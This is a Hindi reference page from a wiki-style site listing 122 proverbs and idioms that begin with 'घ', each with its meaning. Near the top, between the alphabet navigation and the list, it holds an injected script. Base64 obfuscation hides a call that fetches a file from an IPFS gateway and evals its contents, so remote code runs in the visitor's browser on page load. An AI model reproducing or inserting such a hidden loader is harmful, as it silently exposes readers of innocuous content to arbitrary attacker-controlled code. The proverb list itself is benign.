कहावत लोकोक्ति मुहावरे-घ

भारत डिस्कवरी प्रस्तुति
व्यवस्थापन (चर्चा | योगदान) द्वारा परिवर्तित 07:53, 3 जनवरी 2016 का अवतरण (Text replacement - "अवरूद्ध" to "अवरुद्ध")
यहाँ जाएँ:भ्रमण, खोजें

कहावत लोकोक्ति मुहावरे वर्णमाला क्रमानुसार खोजें

                              अं                                                                                              क्ष    त्र    श्र

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

कहावत लोकोक्ति मुहावरे अर्थ

1- घर में नहीं हैं दाने और अम्मा चली भुनाने।

अर्थ -झूठी शान दिखाना, न होने पर ढोंग करना।

2- घड़ी में घर जले, अढ़ाई घड़ी भद्रा।

अर्थ - संकट को होशियारी से दूर करें।

3- घड़ी में तोला, घड़ी में माशा।

अर्थ - चंचल मन वाला।

4- घर आए कुत्ते को भी नहीं निकालते।

अर्थ - घर में आने वाले का सत्कार करना चाहिए।

5- घर का जोगी जोगना, आन गाँव का सिद्ध।

अर्थ - अपने घर में योग्यता का आदर नहीं होता और बाहर का व्यक्ति योग्य समझा जाता है।

6- घर का भेदी लंका ढाए।

अर्थ - घर की फूट का परिणाम बुरा होता है।

7- घर की खांड़ किरकिरी, लगे पड़ोसी का गुड़ मीठा।

अर्थ - अपनी वस्तु़ ख़राब लगती है और दूसरे की अच्छी।

8- घर की मुर्गी दाल बराबर।

अर्थ - अपनी चीज़ या अपने आदमी की क़दर नहीं होती।

9- घर खीर तो, बाहर खीर।

अर्थ - अपने पास कुछ हो तो, बाहर भी आदर होता है।

10- घर का घोड़ा, नखास मोल।

अर्थ - चीज़ घर में पड़ी है और उसकी कोई कीमत नहीं है।

11- घायल की गति घायल जाने।

अर्थ - जो कष्ट भोगता है वही दूसरों का कष्ट समझता है।।

12- घी कहाँ गया ? खिचड़ी में।

अर्थ - वस्तु का प्रयोग ठीक जगह हो गया।

13- घी सँवारे काम, बड़ी बहू का नाम।

अर्थ - काम तो साधन से हुआ, नाम करने वाले का हो गया।

14- घोड़ा घास से यारी करेगा तो खाएगा क्या।

अर्थ - पेशेवर को किसी की से रियायत नहीं करनी चाहिए।

15- घोड़े की दुम बढ़ेगी तो अपनी ही मक्खियाँ उड़ाएगा।

अर्थ - उन्नति करके आदमी अपना ही भला करता है।

16- घोड़े को लात, आदमी को बात।

अर्थ - उत्तम वस्तु थोड़ी भी हो तो अच्छी है।।

17- घडियाँ गिनना।

अर्थ - बेचैनी से प्रतीक्षा करना।

18- घड़ों पानी पड़ जाना।

अर्थ - बहुत शर्मिंदा होना।

19- घर काट खाने को आना/घर काटने का दौड़ना।

अर्थ - अकेलापन अखरना।

20- घर का न घाट का।

अर्थ - कहीं का भी नहीं रहना।

21- घर फूँक तमाशा देखना।

अर्थ - अपनी हानि करके मौज उड़ाना।

22- घर में गंगा बहना।

अर्थ - अच्छी चीज़ पास ही में मिल जाना।

23- घाव पर नमक छिड़कना।

अर्थ - दु:खी को और दु:खी करना।

24- घाव हरा करना।

अर्थ - भूले हुए दु:ख की याद दिलाना।

25- घास काटना।

अर्थ - फूहड़ काम करना। ।

26- घास छीलना।

अर्थ - व्यर्थ समय गवाँना।।

27- घिग्घी बँधना।

अर्थ - स्पष्ट बोल न सकना।

28- घी घना मुट्ठी चना।

अर्थ - जो मिल जाए उसी पर संतुष्ट रहना चाहिए।

29- घी के दिये जलना।

अर्थ - आनंद मंगल होना, खुशियाँ मनाना।

30- घी खिचड़ी होना।

अर्थ - खूब मिल- जुल जाना।।

31- घोंघा बसंत।

अर्थ - मूर्ख होना।

32- घोड़े बेचकर सोना।

अर्थ - निश्चिंत हो जाना।

33- घँघोल डालना।

अर्थ - गँदला या गंदा कर देना।

34- घंटा दिखाना।

अर्थ - ऐसा उत्तर देना या मुद्रा बनाना जिससे आवेदक या इच्छुक पूरी तरह से निराश हो जाए।

35- घंटा हिलाना

अर्थ - व्यर्थ बैठे रहना, व्यर्थ का काम करना।

36- घट घट में बसना

अर्थ - हर एक में व्याप्त होना।

37- घंटे मोरछल से उठाना।

अर्थ - गाजे-बाजे के साथ किसी भाग्यवान की अर्थी निकालना।

38- घड़ियाँ गिनना

अर्थ -अत्यंत उत्सुकतापूर्वक प्रतीक्षा करना, मरणासन्न होना, मृत्यु की इंतजार में होना।

39- घड़ी टेढ़ी होना

अर्थ - समय विपरीत होना।

40- घड़ी दो घड़ी का

अर्थ - कुछ ही क्षणों का।

41- घड़ी पहाड़ हो जाना

अर्थ - थोड़ा समय भी न बीतना

42- घड़ो पानी पड़ना

अर्थ - लोगों के सामने हेय या हीन सिद्ध होने पर अत्यन्त लज्जित होना।

43- घपले में पड़ना/पड़ जाना

अर्थ - खटाई में पड़ना, भ्रमित होना।

44- घबरा उठना

अर्थ - बेचैन होना।

45- घमंड में चूर

अर्थ - घमंड से ओतप्रोत।

46- घर आँगन हो जाना

अर्थ - घर का टूट-फूट कर खँडहर या मैदान हो जाना

47- घर उजड़ना/उजाड़ देना

अर्थ - गृहस्थी चौपट होना।

48- घर कर लेना

अर्थ - अपनी स्थायी निवास बना लेना।

49- घर का आदमी

अर्थ - परिवार का सदस्य, घनिष्ठ मित्र अथवा संबंधी।

50- घर का रास्ता समझना।

अर्थ - सुगम और सुपरिचित समझना।

51- घर के घर

अर्थ - घर की सीमा में ही, आपस में ही।

52- घर के घर रह जाना

अर्थ - ऐसी स्थिति में होना कि व्यापार, लेन देन आदि में न लाभ हो न हानि।

53- घर खाली छोड़ना।

अर्थ - वर करते हुए भी आघात या प्रहार न करना, बल्कि जान बूझकर खाली जाने देना।

54- घर खोद डालना

अर्थ - बार बार किसी के घर जाकर उसे परेशान करना।

55- घर जमाना।

अर्थ - घर गृहस्थी के लिए आवश्यक वस्तुएँ लाना।

56- घर तक पहुँचना

अर्थ - किसी को माँ बहन तक की गालियाँ देना।

57- घर में चूल्हा न जलना

अर्थ - रसोई न बनना। इन्हीं परेशानियों के कारण हमारे यहाँ दो दिन चूल्हा तक नहीं जला।

58- घर में झाड फिरना/फिर जाना

अर्थ - घर में कुछ भी न रह जाना।

59- घर फूँक तमाशा देखना

अर्थ - घर गृहस्थी चौपट या नष्ट करना।

60- घर बचाना

अर्थ - अपने कौशल या चातुराई से प्रहार या बात विफल करना।

61- घर बनाना।

अर्थ - घर में सुख सुविधाओं की व्यवस्था करना।

62- घर फोड़ना।

अर्थ - परिवार के लोगों में परस्पर झगड़ा लगाकर उनमें फूट डालना।

63-घर बोलने लगना

अर्थ - घर में चहल पहल होने लगना।

64-घर बैठे

अर्थ - बिना दौड धूप या प्रयास किए।

65- घर लुटाना

अर्थ - घर की सम्पत्ति गँवाना या व्यर्थ खर्च करना।

66- घर सिर पर उठाना/उठा लेना

अर्थ - बहुत अधिक शोर मचाना या हो हल्ला करना।

67- घर जमाई बनना

अर्थ - दामाद का ससुराल में जाकर रहना।

68-घर द्वार देखना

अर्थ - गृहस्थी सँभालना और उसकी रक्षा करना।

69- घरवाली।

अर्थ - पत्नी।

70- घर्राटा मारना/लेना।

अर्थ - खूब गहरी नींद सोना।

71- घसीटना

अर्थ - उलझाना।

72- घाट घाट का पानी पीना

अर्थ - अनेक स्थलों अथवा उनके निवासियों का रंग-ढंग देखे होना, उनके सम्पर्क या सहवास में आये होना अथवा विविध अनुभव प्राप्त किए होना अनुभवी होना

73- घाट नहाना।

अर्थ - किसी के मरने पर नदी पर नहाना।

74- घाट लगना।

अर्थ - नदी आदि के किनारे नाव का खड़ा होना।

75- घाटा उठाना/आना/ पड़ना

अर्थ - व्यापार में हानि होना, नुक्सान होना, कमी होना।

76- घाटा भरना/भर देना

अर्थ - क्षतिपूर्ति करना।

77- घात ताकना।

अर्थ - उपयुक्त अवसर की ताक में रहना।

78- घात में पड़ना

अर्थ - ऐसी स्थिति में किसी का आना कि उस पर सहज में वार किया जा सके, फँसना, घिरना।

79- घाम का जाना

अर्थ - तेज़ धूप के कारण सूखना या काला पड़ना।

80- घाम खाना

अर्थ - सरदी से बचने के लिए धूप में बैठना।

81-घाम बचाना।

अर्थ - विपत्ति या संकट से स्वयं बचना या किसी को बचाना।

82- घाम लगना।

अर्थ - लू लगना।

83- घाव खाना।

अर्थ - आघात या प्रहार सहने के कारण घायल होना।

84- घाव खाना।

अर्थ - आघात या प्रहार सहने के कारण घायल होना।

85- घाव पर नमक छिड़कना

अर्थ - दुखी व्यक्ति को और अधिक यंत्रणा देना।

86- घाव पुजना/भरना।

अर्थ - क्षत या घाव के भरने के समय अंकुर निकलना।

87- घाव हरा होना/ हो जाना

अर्थ - कष्ट या दुख की घड़ी याद आना और फलतः वही पुराना कष्ट या दुख अनुभूत करना।

88- घास खाए होना।

अर्थ - दिमाग में घास भरी होने के कारण बेवकूफ़ी की बातें करना।

89- घास छीलना/खोदना।

अर्थ - तुच्छ या बेकार हो जाना।

90- घिग्घी बँधना/बँध जाना

अर्थ - भय से आतंकित हो जाने के कारण कंठ का अवरुद्ध हो जाना।

91- घिरनी खाना।

अर्थ - चारो और चक्कर खाना।

92- घी का कुप्पा लुढ़कना।

अर्थ - किसी धनी आदमी का मरना, बहुत बड़ी हानि होना।

93- घी के कुप्पे से लगना

अर्थ - किसी ऐसे व्यक्ति का आश्रय प्राप्त होना जिसके फलस्वरूप बहुत अधिक लाभ हो।

94- घी खिचड़ी होना।

अर्थ - परस्पर अत्यधिक घनिष्ठता या मेल जोल होना।

95- घी बरसाना।

अर्थ - आग में तेल डालना, झगड़े को और बढ़ाना।

96- घुंघरू बाँधना।

अर्थ - नाचने के लिए तैयार होना।

97- घुघरू बोलना।

अर्थ - मरने के समय गले से घुर घुर शब्द निकलना।

98- घुट घुटकर मरना

अर्थ - बराबर एक पर एक कष्ट भोगते हुए मरना।

99- घुटते रहना

अर्थ - छमित इच्छाओं के कारण पीडि़त रहना।

100- घुटना

अर्थ - घनिष्ठता होना।

101- घुटने टेकना/टेक देना

अर्थ - हार मान लेना, आत्मसमर्पण कर देना।

102- घुटा निकलना

अर्थ - छिपा रूस्तम या बहुत होशियार निकलना।

103- घुटटी में पड़ना।

अर्थ - बचपन से आदत पड़ी होना, स्वभाव होना।

104- घुन की तरह चाट जाना

अर्थ - अन्दर ही अन्दर खा जाना या नष्ट कर डालना।

105- घुन लगना/लग जाना।

अर्थ - किसी ऐसे दोष, रोग या चिंता से ग्रस्त होना जो जानलेवा सिद्ध हो रही हो।

106- घुल घुलकर बातें करना

अर्थ - ख़ूब प्रेम से बातें करना।

107- घुल मिल जाना

अर्थ - एक हो जाना।

108- घुला घुलाकर मारना।

अर्थ - ऐसी स्थिति उत्पन्न करना कि कोई बराबर कष्ट भोगता मर जाए।

109- घुलाना

अर्थ - ऐसा काम करना कि जिससे कोई घुल घुलकर क्षीण हो जाए।

110- घुसकर बैठना

अर्थ - किसी के साथ सटकर बैठना, अथवा किसी की आड़ में छिपकर बैठना।

111- घूँघट करना

अर्थ - न करना, स्त्री का अपने चेहरे का पल्ले से ढ़कना।

112- घूँघट उठाना।

अर्थ - स्त्री का किसी के सम्मुख पर्दा।

113- घूँट जाना

अर्थ - पी जाना, चुपचाप सहन कर लेना।

114- घूम पड़ना

अर्थ - आवेश या क्रोध में आकर किसी दूसरे से बातें करने लगना।

115- घेर घार करना

अर्थ - अनुचित दबाव डालना तथा विवश करना।

116-घोटाले मे पड़ना।

अर्थ - धन आदि का ऐसी स्थिति में होना कि उसकी वसूली होने की संभावना क्षीण हो।

117- घोड़ा उठाना।

अर्थ - घोड़े को तेज दौड़ाना।

118- घोड़ा उलाँगना।

अर्थ - किसी नए घोड़े पर पहले-पहले सवारी करना।

119- घोड़ा खोलना।

अर्थ - घोड़े का साज खोलना।

120-घोड़ा निकालना।

अर्थ - घोड़े को सवारी के योग्य बनाना।

121- घोड़े पर चढ़े चले आना

अर्थ - कहीं पहुँचते ही वहाँ से चलने की रट लगाने लगना।

122- घोल कर पी जाना

अर्थ - अस्तित्व ही न रहने देना।